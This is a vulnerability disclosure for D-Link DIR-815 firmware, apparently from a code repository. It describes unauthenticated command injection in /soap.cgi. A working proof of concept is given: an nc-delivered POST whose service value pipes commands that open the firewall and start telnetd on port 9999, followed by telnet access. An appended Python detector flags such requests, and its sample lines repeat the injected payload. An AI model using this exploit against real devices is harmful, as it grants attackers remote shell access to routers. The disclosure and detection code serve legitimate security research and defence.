WhereisRain/dir-815

dir-815

Exploit Author: yangchunyu@whu.edu.cn

Vendor: D-Link

Firmware: dir815_v1.01SSb08.bin

I found an unauthenticated remote code execution vulnerability in the soapcgi_main function of the cgibin binary.

By sending an HTTP POST request to /soap.cgi on port 49152 with a crafted service GET parameter, an unauthenticated remote attacker can execute shell commands.

Similar vulnerabilities already exist as CVE-2018-6530 and CVE-2018-20114.


The device can be exploited with the | character, too.

PoC

nc 192.168.0.1 49152
POST /soap.cgi?service=|iptables -P INPUT ACCEPT|iptables -P FORWARD ACCEPT|iptables -P OUTPUT ACCEPT|iptables -t nat -P PREROUTING ACCEPT|iptables -t nat -P OUTPUT ACCEPT|iptables -t nat -P POSTROUTING ACCEPT|telnetd -p 9999| HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

whatever content...

telnet 192.168.0.1 9999
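
A detection-side check for the request shape shown above, added here as an example and not part of the original repository: it scans HTTP request lines (for instance from a capture of traffic to port 49152) and reports /soap.cgi requests whose service value falls outside a conservative allowlist. The allowlist pattern, the function names and the sample lines are constructed assumptions, not taken from the firmware.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate service name is a short token with no shell syntax.
SAFE_SERVICE = re.compile(r"[A-Za-z0-9_.:-]{1,64}")
# The target is matched greedily because an injected value may contain spaces.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>.+) HTTP/\d\.\d$")


def inspect_request_line(line):
    """Return the decoded `service` values that fail the allowlist.

    An empty list means the line is not a /soap.cgi request or looks clean.
    The method is not checked, so non-POST probes are reported as well.
    """
    match = REQUEST_LINE.match(line.strip())
    if not match:
        return []
    path, _, query = match.group("target").partition("?")
    if unquote(path) != "/soap.cgi":
        return []
    findings = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote(name) != "service":
            continue
        value = unquote(raw)  # decode first so %7C is treated like |
        if not SAFE_SERVICE.fullmatch(value):
            findings.append(value)
    return findings


def scan(lines):
    """Return (line_number, value) for every suspicious service value."""
    return [(number, value)
            for number, line in enumerate(lines, start=1)
            for value in inspect_request_line(line)]


# Constructed sample request lines (not real captured traffic).
SAMPLE = [
    "POST /soap.cgi?service=WANIPConn1 HTTP/1.1",
    "POST /soap.cgi?service=|telnetd -p 9999| HTTP/1.1",
    "POST /soap.cgi?service=%7Ctelnetd%20-p%209999%7C HTTP/1.1",
    "GET /index.html?service=|x| HTTP/1.1",
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE):
        print(f"line {number}: suspicious service value {value!r}")
```

An allowlist is used rather than a list of bad characters so that the check does not depend on which separator a request uses.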
